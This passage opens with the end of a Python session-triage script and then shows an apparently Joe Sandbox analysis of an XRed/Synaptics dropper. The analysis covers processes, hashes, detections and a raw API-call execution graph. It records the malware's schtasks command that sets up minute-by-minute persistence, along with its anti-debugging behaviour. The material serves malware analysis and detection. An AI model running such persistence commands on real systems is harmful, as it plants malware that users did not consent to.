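        "status": int(resp_line.split(" ")[1]),
        "redirect_host": urlparse(location).hostname if location else None,
    }


def flagged(sessions, threshold=3):
    """Session IDs whose score reaches the (assumed) threshold, in input order."""
    return [r["session"] for r in map(triage, sessions) if r["score"] >= threshold]


if __name__ == "__main__":
    for record in SAMPLE_SESSIONS:
        result = triage(record)
        print(result["session"], result["status"], result["score"], result["reasons"])
    print("flagged:", flagged(SAMPLE_SESSIONS))
```

The 404 is not a reason to lower the score: a dead payload link still proves the loader ran and still yields the Drive file ID as a pivot for other samples, which is why `file_id` and `redirect_host` are returned alongside the score.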


Target ID:0
Start time:05:25:10
Start date:30/12/2024
Path:C:\Users\user\Desktop\Machine-PO.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\Machine-PO.exe"
Imagebase:0x400000
File size:2'208'256 bytes
MD5 hash:A6BD561711EA8C2064C20644CCEEE074
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:2
Start time:05:25:11
Start date:30/12/2024
Path:C:\Users\user\Desktop\._cache_Machine-PO.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\._cache_Machine-PO.exe"
Imagebase:0x1a0000
File size:1'436'672 bytes
MD5 hash:3BF7444911198B54B1E8AB53F236683E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 61%, ReversingLabs
Reputation:low
Has exited:false

Target ID:3
Start time:05:25:11
Start date:30/12/2024
Path:C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):true
Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:0x400000
File size:771'584 bytes
MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 92%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:05:25:12
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:53'161'064 bytes
                                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:5
                                                                                                              Start time:05:25:13
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                                                                                                              Imagebase:0xa40000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:05:25:13
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:7
                                                                                                              Start time:05:25:13
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
                                                                                                              Imagebase:0xad0000
                                                                                                              File size:147'456 bytes
                                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2753117932.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2754697002.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:8
                                                                                                              Start time:05:25:13
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                                                                                                              Imagebase:0xc10000
                                                                                                              File size:187'904 bytes
                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:10
                                                                                                              Start time:05:25:16
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 61%, ReversingLabs
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:13
                                                                                                              Start time:05:25:24
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:15
                                                                                                              Start time:05:25:32
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:771'584 bytes
                                                                                                              MD5 hash:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:18
                                                                                                              Start time:05:25:35
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 2996
                                                                                                              Imagebase:0xed0000
                                                                                                              File size:483'680 bytes
                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:19
                                                                                                              Start time:05:25:41
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:22
                                                                                                              Start time:05:25:49
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:23
                                                                                                              Start time:05:26:01
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:25
                                                                                                              Start time:05:27:00
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                                                                                                              Imagebase:0x200000
                                                                                                              File size:1'436'672 bytes
                                                                                                              MD5 hash:3BF7444911198B54B1E8AB53F236683E
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:26
                                                                                                              Start time:05:27:16
                                                                                                              Start date:30/12/2024
                                                                                                              Path:C:\Windows\splwow64.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\splwow64.exe 12288
                                                                                                              Imagebase:0x7ff616c20000
                                                                                                              File size:163'840 bytes
                                                                                                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 6.2%
Total number of Nodes: 1461
Total number of Limit Nodes: 147
[Execution graph: the interactive node/edge rendering is not reproduced. The underlying execution_graph listing is a sequence of node records (six-digit node id, code address, optional labels such as an API name, a CRT routine name like __lseeki64 or _memset, or a summary like "47 API calls 3 library calls") interleaved with src->dst edge tokens; the root node is 102605 at address 226a80. API calls that appear as node labels include: process start-up (GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, GetModuleFileNameW, TlsAlloc, TlsSetValue, InitializeCriticalSectionAndSpinCount, GetStdHandle, GetFileType); anti-debugging and crash handling (IsDebuggerPresent with a branch into MessageBoxA, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, ExitProcess, RaiseException); a token group membership check (the AllocateAndInitializeSid, CheckTokenMembership, FreeSid sequence); dynamic import resolution (LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary, GetModuleHandleExW); embedded resource access (FindResourceExW, LoadResource, SizeofResource, LockResource, CreateStreamOnHGlobal); a GUI and message loop (GetSysColorBrush, LoadCursorW, LoadIconW, CreateWindowExW, ShowWindow, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, LockWindowUpdate, DestroyWindow, Shell_NotifyIconW, GetOpenFileNameW, SHGetMalloc, IsThemeActive, SystemParametersInfoW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFullPathNameW); child-process handling (GetForegroundWindow followed by ShellExecuteW, WaitForSingleObject, GetExitCodeProcess, CloseHandle); and timing (timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, GetSystemTimeAsFileTime). Heap work goes through RtlAllocateHeap and RtlFreeHeap.
Caveat: the code addresses in this graph fall in the 0x20xxxx to 0x27xxxx range, far below the 0x7ff616c20000 image base listed for splwow64.exe in the process entry above, so the graph should be matched to its process through the report's own process/graph pairing rather than assumed to belong to the entry that precedes it.]
103688 274abd 103685->103688 103741 203bcf 103686->103741 103689 2031cd GetFullPathNameW 103690 2031e7 103689->103690 103690->102969 103692 203ade 103691->103692 103693 203a8b SHGetDesktopFolder 103691->103693 103692->102972 103693->103692 103694 203a99 103693->103694 103694->103692 103695 203ac8 SHGetPathFromIDListW 103694->103695 103695->103692 103699 203ba9 103696->103699 103703 203b72 103696->103703 103697 221bc7 _W_store_winword 59 API calls 103697->103699 103698 203bcf 48 API calls 103700 203b7d 103698->103700 103699->103697 103701 2733e5 103699->103701 103699->103703 103745 20197e 103700->103745 103703->103698 103705 20197e 48 API calls 103706 203b9f 103705->103706 103707 203dcb 103706->103707 103708 203f9b 136 API calls 103707->103708 103709 203def 103708->103709 103710 2739f9 103709->103710 103712 203f9b 136 API calls 103709->103712 103711 24cc82 122 API calls 103710->103711 103714 273a0e 103711->103714 103713 203e02 103712->103713 103713->103710 103715 203e0a 103713->103715 103716 273a12 103714->103716 103717 273a2f 103714->103717 103718 203e16 103715->103718 103719 273a1a 103715->103719 103720 203e39 84 API calls 103716->103720 103721 22010a 48 API calls 103717->103721 103775 20bdf0 163 API calls 8 library calls 103718->103775 103776 24757b 87 API calls _wprintf 103719->103776 103720->103719 103740 273a74 Mailbox 103721->103740 103724 203e2e 103724->102970 103725 273a28 103725->103717 103726 273c24 103727 2228ca _free 47 API calls 103726->103727 103728 273c2c 103727->103728 103729 203e39 84 API calls 103728->103729 103734 273c35 103729->103734 103733 2228ca _free 47 API calls 103733->103734 103734->103733 103735 203e39 84 API calls 103734->103735 103778 2432b0 86 API calls 4 library calls 103734->103778 103735->103734 103737 20caee 48 API calls 103737->103740 103740->103726 103740->103734 103740->103737 103751 2430ac 103740->103751 103754 24a525 103740->103754 103760 20b6d0 103740->103760 103769 20a870 103740->103769 103777 242fcd 60 API calls 2 library 
calls 103740->103777 103742 203bd9 __NMSG_WRITE 103741->103742 103743 22010a 48 API calls 103742->103743 103744 203bee _wcscpy 103743->103744 103744->103689 103746 201990 103745->103746 103750 2019af _memmove 103745->103750 103748 22010a 48 API calls 103746->103748 103747 22010a 48 API calls 103749 2019c6 103747->103749 103748->103750 103749->103705 103750->103747 103752 22010a 48 API calls 103751->103752 103753 2430dc _memmove 103752->103753 103753->103740 103755 24a530 103754->103755 103756 22010a 48 API calls 103755->103756 103757 24a547 103756->103757 103758 24a556 103757->103758 103759 20caee 48 API calls 103757->103759 103758->103740 103759->103758 103761 20b6e3 _memmove 103760->103761 103762 20b789 103760->103762 103763 22010a 48 API calls 103761->103763 103764 22010a 48 API calls 103762->103764 103766 20b6ea 103763->103766 103764->103761 103765 20b71b 103765->103740 103766->103765 103767 22010a 48 API calls 103766->103767 103768 20b74d 103767->103768 103768->103740 103770 20a883 103769->103770 103772 20a93d 103769->103772 103771 22010a 48 API calls 103770->103771 103770->103772 103773 20a8c1 103770->103773 103771->103773 103772->103740 103773->103772 103774 22010a 48 API calls 103773->103774 103774->103773 103775->103724 103776->103725 103777->103740 103778->103734 103780 20a848 103779->103780 103781 20a72c 103779->103781 103780->102978 103781->103780 103782 22010a 48 API calls 103781->103782 103783 20a753 103782->103783 103784 22010a 48 API calls 103783->103784 103785 20a7c5 103784->103785 103785->103780 103788 20a870 48 API calls 103785->103788 103789 20b6d0 48 API calls 103785->103789 103792 20ace0 91 API calls 2 library calls 103785->103792 103793 24a3ee 48 API calls 103785->103793 103788->103785 103789->103785 103790->102980 103791->102982 103792->103785 103793->103785 103795 2031a2 LoadImageW 103794->103795 103796 274ad8 EnumResourceNamesW 103794->103796 103797 203118 RegisterClassExW 103795->103797 103796->103797 103798 202f58 7 API calls 
103797->103798 103798->102997 103800 20e7fd 103799->103800 103801 20e80f 103799->103801 103878 20dcd0 103800->103878 103909 24d520 86 API calls 4 library calls 103801->103909 103803 20e806 103803->103057 103805 2798e8 103805->103805 103917 20325d 103806->103917 103808 20323b 103809 20325a 103808->103809 103811 2766cc 103808->103811 103809->103004 103812 21ec33 103809->103812 103811->103808 103921 24a31d 13 API calls Mailbox 103811->103921 103813 20caee 48 API calls 103812->103813 103814 21ec5d 103813->103814 103815 20d380 55 API calls 103814->103815 103816 21ec6d Mailbox 103815->103816 103817 20caee 48 API calls 103816->103817 103818 21ec96 103817->103818 103819 20d380 55 API calls 103818->103819 103822 21eca6 Mailbox 103819->103822 103820 21ecdb 103820->103010 103822->103820 103923 21cf79 49 API calls 103822->103923 103924 24d80a 255 API calls 103822->103924 103824->103057 103825->103057 103826->103057 103827->103057 103828->103057 103829->103057 103830->103011 103831->103057 103832->103057 103833->103054 103834->103054 103835->103054 103837 20fa60 103836->103837 103873 20fa8e Mailbox _memmove 103836->103873 103838 22010a 48 API calls 103837->103838 103838->103873 103839 21105e 103840 20c935 48 API calls 103839->103840 103866 20fbf1 Mailbox 103840->103866 103841 23a599 InterlockedDecrement 103841->103873 103842 20d3d2 48 API calls 103842->103873 103844 210119 103950 24d520 86 API calls 4 library calls 103844->103950 103845 22010a 48 API calls 103845->103873 103847 20c935 48 API calls 103847->103873 103849 211063 103949 24d520 86 API calls 4 library calls 103849->103949 103850 210dee 103932 20d89e 103850->103932 103851 210dfa 103856 20d89e 50 API calls 103851->103856 103853 27b772 103951 24d520 86 API calls 4 library calls 103853->103951 103857 210e83 103856->103857 103861 20caee 48 API calls 103857->103861 103859 221b2a 52 API calls __cinit 103859->103873 103860 27b7d2 103872 2110f1 Mailbox 103861->103872 103863 211230 103863->103866 103948 24d520 86 API calls 4 
library calls 103863->103948 103866->103057 103867 20fa40 255 API calls 103867->103873 103870 27b583 103946 24d520 86 API calls 4 library calls 103870->103946 103947 24d520 86 API calls 4 library calls 103872->103947 103873->103839 103873->103841 103873->103842 103873->103844 103873->103845 103873->103847 103873->103849 103873->103850 103873->103851 103873->103853 103873->103857 103873->103859 103873->103863 103873->103866 103873->103867 103873->103870 103873->103872 103925 26798d 103873->103925 103930 20f6d0 255 API calls 2 library calls 103873->103930 103931 211620 59 API calls Mailbox 103873->103931 103942 25ee52 82 API calls 2 library calls 103873->103942 103943 25ef9d 90 API calls Mailbox 103873->103943 103944 24b020 48 API calls 103873->103944 103945 25e713 255 API calls Mailbox 103873->103945 103875->103054 103876->103054 103877->103054 103879 20fa40 255 API calls 103878->103879 103892 20dd0f _memmove 103879->103892 103880 278dbe 103916 24d520 86 API calls 4 library calls 103880->103916 103882 278ddc 103882->103882 103883 20dd70 103883->103803 103884 20e12b Mailbox 103886 22010a 48 API calls 103884->103886 103885 20e051 103888 20e066 103885->103888 103889 278daf 103885->103889 103899 20decb _memmove 103886->103899 103887 22010a 48 API calls 103887->103892 103891 22010a 48 API calls 103888->103891 103915 25d1da 50 API calls 103889->103915 103902 20df64 103891->103902 103892->103880 103892->103883 103892->103884 103892->103887 103893 20deb7 103892->103893 103905 20df29 103892->103905 103893->103884 103895 20dec4 103893->103895 103894 22010a 48 API calls 103896 20def6 103894->103896 103897 22010a 48 API calls 103895->103897 103896->103905 103910 214320 255 API calls 103896->103910 103897->103899 103898 278d9e 103914 24d520 86 API calls 4 library calls 103898->103914 103899->103894 103899->103896 103899->103905 103902->103803 103904 278d76 103913 24d520 86 API calls 4 library calls 103904->103913 103905->103885 103905->103898 103905->103902 103905->103904 103907 
278d51 103905->103907 103911 205322 255 API calls 103905->103911 103912 24d520 86 API calls 4 library calls 103907->103912 103909->103805 103910->103905 103911->103905 103912->103902 103913->103902 103914->103902 103915->103880 103916->103882 103918 203269 103917->103918 103919 20327f 103918->103919 103922 25592d InternetCloseHandle InternetCloseHandle WaitForSingleObject 103918->103922 103919->103808 103921->103811 103922->103918 103923->103822 103924->103822 103952 2019ee 103925->103952 103929 2679a4 103929->103873 103930->103873 103931->103873 103933 20d8ac 103932->103933 103940 20d8db Mailbox 103932->103940 103934 20d8ff 103933->103934 103936 20d8b2 Mailbox 103933->103936 103935 20c935 48 API calls 103934->103935 103935->103940 103937 20d8c7 103936->103937 103938 274e9b 103936->103938 103939 274e72 VariantClear 103937->103939 103937->103940 103938->103940 104093 23a599 InterlockedDecrement 103938->104093 103939->103940 103940->103851 103942->103873 103943->103873 103944->103873 103945->103873 103946->103872 103947->103866 103948->103849 103949->103844 103950->103853 103951->103860 103953 20d89e 50 API calls 103952->103953 103954 201a08 103953->103954 103955 201a12 103954->103955 103956 27db7d 103954->103956 103978 2084a6 103955->103978 103958 207e53 48 API calls 103956->103958 103960 27db8d 103958->103960 103959 201a1f 103961 20c935 48 API calls 103959->103961 103960->103960 103962 201a2d 103961->103962 103963 201dce 103962->103963 103964 201de4 Mailbox 103963->103964 103965 27db26 103964->103965 103966 201dfd 103964->103966 103967 27db2b IsWindow 103965->103967 103968 201e46 103966->103968 103971 2084a6 81 API calls 103966->103971 103969 201e51 103967->103969 103970 27db3f 103967->103970 103968->103969 103973 27db65 IsWindow 103968->103973 103969->103929 104054 20200a 48 API calls 103970->104054 103974 201e17 103971->103974 103973->103969 103973->103970 104000 201f04 103974->104000 103975 27db4b 103977 20197e 48 API calls 103975->103977 103977->103969 103979 
2084be 103978->103979 103993 2084ba 103978->103993 103980 275592 __i64tow 103979->103980 103981 2084d2 103979->103981 103982 275494 103979->103982 103990 2084ea __itow Mailbox _wcscpy 103979->103990 103998 22234b 80 API calls 3 library calls 103981->103998 103983 27549d 103982->103983 103984 27557a 103982->103984 103989 2754bc 103983->103989 103983->103990 103999 22234b 80 API calls 3 library calls 103984->103999 103987 22010a 48 API calls 103988 2084f4 103987->103988 103992 20caee 48 API calls 103988->103992 103988->103993 103991 22010a 48 API calls 103989->103991 103990->103987 103995 2754d9 103991->103995 103992->103993 103993->103959 103994 22010a 48 API calls 103996 2754ff 103994->103996 103995->103994 103996->103993 103997 20caee 48 API calls 103996->103997 103997->103993 103998->103990 103999->103990 104001 201f1a Mailbox 104000->104001 104002 20c935 48 API calls 104001->104002 104003 201f3e 104002->104003 104004 20c935 48 API calls 104003->104004 104005 201f49 104004->104005 104006 207e53 48 API calls 104005->104006 104007 201f59 104006->104007 104008 20d3d2 48 API calls 104007->104008 104009 201f87 104008->104009 104010 20d3d2 48 API calls 104009->104010 104011 201f90 104010->104011 104012 20d3d2 48 API calls 104011->104012 104013 201f99 104012->104013 104014 272569 104013->104014 104015 201fac 104013->104015 104056 23e4ea 60 API calls 3 library calls 104014->104056 104017 272583 104015->104017 104019 201fbe GetForegroundWindow 104015->104019 104018 20a4f6 48 API calls 104017->104018 104021 272597 104018->104021 104055 20200a 48 API calls 104019->104055 104023 272899 104021->104023 104026 20a4f6 48 API calls 104021->104026 104022 201fcc 104024 20197e 48 API calls 104022->104024 104025 2728ab 104023->104025 104028 20c935 48 API calls 104023->104028 104027 201fe1 104024->104027 104029 2728d6 104025->104029 104030 20b8a7 48 API calls 104025->104030 104053 2725ad 104026->104053 104043 201fe4 Mailbox 104027->104043 104028->104025 104031 2728f1 104029->104031 
104037 20b8a7 48 API calls 104029->104037 104034 2728ce CharUpperBuffW 104030->104034 104032 2728fc GetDesktopWindow EnumChildWindows 104031->104032 104033 27290b EnumWindows 104031->104033 104036 272911 104032->104036 104033->104036 104062 23e69d 104033->104062 104034->104029 104060 23e44e 48 API calls Mailbox 104036->104060 104038 2728e9 CharUpperBuffW 104037->104038 104038->104031 104040 272922 Mailbox 104041 272940 104040->104041 104061 20200a 48 API calls 104040->104061 104043->103968 104044 27281d 104047 27282a IsWindow 104044->104047 104045 272842 GetForegroundWindow 104046 27283c 104045->104046 104046->104043 104046->104045 104059 20200a 48 API calls 104046->104059 104047->104043 104047->104046 104049 205cf6 47 API calls 104049->104053 104050 20c935 48 API calls 104050->104053 104052 222241 48 API calls 104052->104053 104053->104023 104053->104043 104053->104044 104053->104046 104053->104049 104053->104050 104053->104052 104057 23d68d 49 API calls 104053->104057 104058 205be9 61 API calls 104053->104058 104054->103975 104055->104022 104056->104017 104057->104053 104058->104053 104059->104046 104060->104040 104061->104041 104063 23e6a9 104062->104063 104064 23e6d4 GetClassNameW 104063->104064 104065 23e6f7 _wcscmp 104063->104065 104064->104065 104066 23e70d GetWindowTextW 104065->104066 104080 23e7b3 _wcscmp 104065->104080 104068 23e726 __NMSG_WRITE 104066->104068 104075 23e73d _wcscmp __wopenfile _wcsstr 104066->104075 104067 23e7c8 GetWindowTextW 104070 20caee 48 API calls 104067->104070 104071 23e730 CharUpperBuffW 104068->104071 104069 23e849 GetClassNameW 104073 20caee 48 API calls 104069->104073 104074 23e7e9 104070->104074 104071->104075 104072 23e8a6 104077 23e8b7 GetWindowRect 104072->104077 104083 23e8cc 104072->104083 104076 23e86a 104073->104076 104090 207e36 48 API calls 104074->104090 104079 23e791 GetClassNameW 104075->104079 104075->104080 104091 207e36 48 API calls 104076->104091 104077->104083 104079->104080 104080->104067 104088 23e833 
_wcscmp 104080->104088 104084 23e954 104083->104084 104085 20197e 48 API calls 104083->104085 104085->104084 104086 23e7f6 Mailbox 104086->104088 104089 23e811 GetClassNameW 104086->104089 104087 23e877 Mailbox 104087->104072 104092 23e970 SendMessageTimeoutW EnumChildWindows 104087->104092 104088->104069 104088->104087 104089->104088 104090->104086 104091->104087 104092->104072 104093->103940 104095 221eee __lseeki64 104094->104095 104096 228984 __lock 47 API calls 104095->104096 104101 221ef5 _doexit 104096->104101 104099 22200b __lseeki64 104099->102731 104107 221ffc 104101->104107 104102 221ff3 104103 221d65 _fast_error_exit 3 API calls 104102->104103 104104 221ffc 104103->104104 104106 222009 104104->104106 104112 228ae8 LeaveCriticalSection 104104->104112 104106->102731 104108 222002 104107->104108 104109 221fdc 104107->104109 104113 228ae8 LeaveCriticalSection 104108->104113 104109->104099 104111 228ae8 LeaveCriticalSection 104109->104111 104111->104102 104112->104106 104113->104109 104114 2029c2 104115 2029cb 104114->104115 104116 202a48 104115->104116 104117 2029e9 104115->104117 104158 202a46 104115->104158 104121 272307 104116->104121 104122 202a4e 104116->104122 104118 2029f6 104117->104118 104119 202aac PostQuitMessage 104117->104119 104124 202a01 104118->104124 104125 27238f 104118->104125 104126 202a39 104119->104126 104120 202a2b DefWindowProcW 104120->104126 104123 20322e 16 API calls 104121->104123 104127 202a53 104122->104127 104128 202a76 SetTimer RegisterWindowMessageW 104122->104128 104129 27232e 104123->104129 104130 202ab6 104124->104130 104131 202a09 104124->104131 104166 2457fb 60 API calls _memset 104125->104166 104134 202a5a KillTimer 104127->104134 104135 2722aa 104127->104135 104128->104126 104132 202a9f CreatePopupMenu 104128->104132 104136 21ec33 255 API calls 104129->104136 104161 201e58 53 API calls _memset 104130->104161 104137 272374 104131->104137 104138 202a14 104131->104138 104132->104126 104159 202b94 Shell_NotifyIconW 
